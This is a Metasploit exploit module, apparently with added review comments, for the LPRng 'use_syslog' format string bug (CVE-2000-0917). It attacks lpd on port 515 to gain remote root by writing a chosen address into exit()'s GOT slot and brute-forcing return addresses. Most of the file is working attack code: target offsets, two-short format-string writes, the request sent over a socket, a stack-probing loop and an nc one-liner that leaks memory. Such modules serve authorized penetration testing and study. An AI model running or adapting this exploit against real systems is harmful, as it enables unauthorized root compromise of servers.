##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# modules/exploits/linux/misc/lprng_format_string.rb
#
# Remote root exploit for the LPRng "use_syslog" format string bug
# (CVE-2000-0917): the request line the client sends ends up as the format
# string of a syslog call. The module uses that to write a chosen address
# ('Ret') over a function pointer ('FlowHook' - the GOT slot of exit() on the
# one tested target) and brute-forces 'Ret' one connection at a time.
#
# Mixins used:
#   Tcp          - connect / sock / disconnect and the RPORT option
#   Brute        - its exploit() walks the target's 'Bruteforce' range and
#                  calls brute_exploit(addrs) once per candidate
#   FormatString - fmtstr_set_caps and generate_fmt_two_shorts
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute
  include Msf::Exploit::FormatString

  # Module metadata. Points worth knowing before running it:
  #   'Privileged'    - lpd runs as root, so the payload does too; hence the
  #                     PrependSetresuid default.
  #   'Payload'       - Space is capped at 130 because the format string itself
  #                     needs roughly 50 bytes of the target's buffer (see the
  #                     inline comment). BadChars: NUL, newline (the request
  #                     line terminator appended in brute_exploit), space, and
  #                     '%' (presumably because a '%' inside the payload would be
  #                     parsed as a directive by the same vulnerable call).
  #   'Targets'       - only the Caldera entry is marked as tested. The
  #                     Slackware/RedHat entries are disabled inside =begin/=end
  #                     and cannot be selected. 'Debug' is a deliberate miss.
  #   'DefaultTarget' - left unset, so the framework default applies
  #                     (presumably index 0, the Caldera target).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
        'Description' => %q{
          This module exploits a format string vulnerability in the LPRng print server.
          This vulnerability was discovered by Chris Evans. There was a publicly
          circulating worm targeting this vulnerability, which prompted RedHat to pull
          their 7.0 release. They consequently re-released it as "7.0-respin".
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2000-0917' ],
          [ 'OSVDB', '421' ],
          [ 'BID', '1712' ],
          [ 'US-CERT-VU', '382365' ],
          [ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
          [ 'EDB', '226' ],
          [ 'EDB', '227' ],
          [ 'EDB', '230' ]
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_X86,
        'Privileged' => true, # root
        'DefaultOptions' => {
          'PrependSetresuid' => true
        },
        'Payload' => {
          'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)
          'BadChars' => "\x00\x0a\x20\x25",
        },
        'Targets' => [
          # tested OK - jjd
          [
            'Caldera OpenLinux 2.3 Bruteforce',
            {
              'Platform' => 'linux',
              # Stack-argument index handed to the FormatString mixin for direct
              # parameter access; it was found with the probe loop that is
              # commented out in #exploit below.
              'NumPops' => 243,
              # Address that receives 'Ret': the GOT slot of exit(), so control
              # is presumably hijacked at lpd's next exit() call. The
              # data-segment alternative 0x809c180+(41+4+10+48) was rejected
              # because it gets corrupted.
              'FlowHook' => 0x80992d4, # GOT of exit
              # Candidate 'Ret' values, tried one connection each by the Brute
              # mixin. Note Start > Stop, i.e. the walk runs downward -
              # presumably the Brute mixin negates Step for that; confirm.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xcffffff4 },
                'Stop' => { 'Ret' => 0x7fffe004 },
                'Step' => 16
              }
            }
          ],
=begin
          # untested (from public exploits)
          [ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
            {
              'NumPops' => 299,
              'Ret' => 0xbffff640,
              'FlowHook' => 0xbfffee30
            }
          ],
          [ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
            {
              'NumPops' => 304,
              'Ret' => 0xbffff920,
              'FlowHook' => 0xbffff0f0
            }
          ],
          [ 'RedHat 7.0 - Guinesss',
            {
              'NumPops' => 300,
              'Ret' => 0x41424344,
              'FlowHook' => 0xbffff3ec
            }
          ],
          [ 'RedHat 7.0 - Guinesss-dev',
            {
              'NumPops' => 300,
              'Ret' => 0x41424344,
              'FlowHook' => 0xbffff12c
            }
          ],
=end
          # ...
          # Placeholder for attaching a debugger: NumPops 1 is sure to miss and
          # the marker values (0x41424344 written to 0x45464748) will presumably
          # only fault the daemon. Never a working target.
          [
            'Debug',
            {
              'NumPops' => 1, # sure to miss.
              'Ret' => 0x41424344,
              'FlowHook' => 0x45464748
            }
          ]
        ],
        # 'DefaultTarget' => 0,
        'DisclosureDate' => '2000-09-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(515) ])
  end

  # Entry point. Configures the FormatString mixin, then defers to the Brute
  # mixin's exploit (via super), which iterates the target's 'Bruteforce'
  # range and calls brute_exploit for each candidate address.
  def exploit
    # we want to use DPA for this one :)
    # (positional capability flags for the FormatString mixin; per the comment
    # above the second one enables direct parameter access, "%N$x", so the
    # stack slot selected by 'NumPops' can be addressed directly)
    fmtstr_set_caps(false, true)

    # check syslog to see which number hits 41414141
    # One-off probe used to find 'NumPops': sends "aAAAABBBB|%N$x|N" for
    # N = 1..400 and the operator watches syslog on the target for the N whose
    # %x prints 41414141. Disabled; kept for re-tuning against a new target.
=begin
    400.times { |x|
      connect
      buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
      sock.put(buf)
      #handler
      disconnect
    }
=end
    print_status("Trying target #{target.name} ..")

    super
  end

  # Called by the Brute mixin once per candidate; addrs['Ret'] is the value to
  # write over target['FlowHook'].
  #
  # What is sent, as one newline-terminated request line:
  #   "_" * 4 | format string (two 16-bit %n writes) | 32 NOPs | filler | "\n"
  #
  # NOTE(review): the selected payload is never sent. `fmtbuf << payload.encoded`
  # is commented out and a 32-byte NOP sled plus Rex::Text.charset_exclude
  # (every byte except the BadChars, i.e. 252 bytes) is appended instead - a
  # character-set probe, not shellcode, and together with the sled it is
  # larger than the 130-byte Space declared in initialize. Restoring the
  # payload line and dropping the two filler lines is the obvious fix, but the
  # Caldera 'Ret' range was presumably tuned against this layout, so re-verify
  # on a target after changing it.
  def brute_exploit(addrs)
    # print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])

    # Text LPRng has already written to the syslog line before our data
    # appears; its length (41, the same constant in the Caldera target's
    # comment) seeds the %n byte count. The trailing "\\35" is presumably the
    # octal escape syslog uses for a non-printable byte - confirm on a target.
    printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ..."
    # Bytes emitted before the format string's own output starts: the prefix,
    # the 4-byte pad below, plus 2 more (presumably the characters between the
    # prefix and our data - confirm against the actual syslog line).
    num_start = printed.length + 2 + 4

    # write 'ret' addr to flowhook (execute shellcode)
    # NOTE: the resulting two writes must be done at the same time

    # characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
    # 4-byte pad, presumably so the addresses embedded in the format string
    # are 4-byte aligned relative to the stack slot 'NumPops' selects.
    fmtbuf = "_" * 4
    # Two 16-bit %n writes that together store addrs['Ret'] at target['FlowHook'].
    fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
    # print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")

    # append payload and newline
    # fmtbuf << payload.encoded
    fmtbuf << "\x90" * 32 # NOP sled
    fmtbuf << Rex::Text.charset_exclude(payload_badchars) # 252-byte probe, see NOTE above
    fmtbuf << "\n" # request-line terminator (presumably why 0x0a is a BadChar)

    print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])

    # One connection per candidate. A wrong 'Ret' written into the exit() GOT
    # presumably crashes that lpd child, so the brute force is noisy and relies
    # on the service being restarted for each attempt; expect a syslog entry on
    # the target for every try.
    connect
    # print_status("Sleeping, attach now!!")
    # select(nil,nil,nil,5)

    sock.put(fmtbuf)

    # start the payload handler before tearing the connection down
    handler
    disconnect
  end
end

=begin

HRM!

The following causes info leakage!
(The same bug used as a read primitive: each %x dumps a stack word, and the
hexdump of nc's output below shows the formatted line coming back to the client.)

bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC

There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
0x01 -> 0x09...

It's unclear if there is a way to auto-detect the lpd version via LPD commands.

=end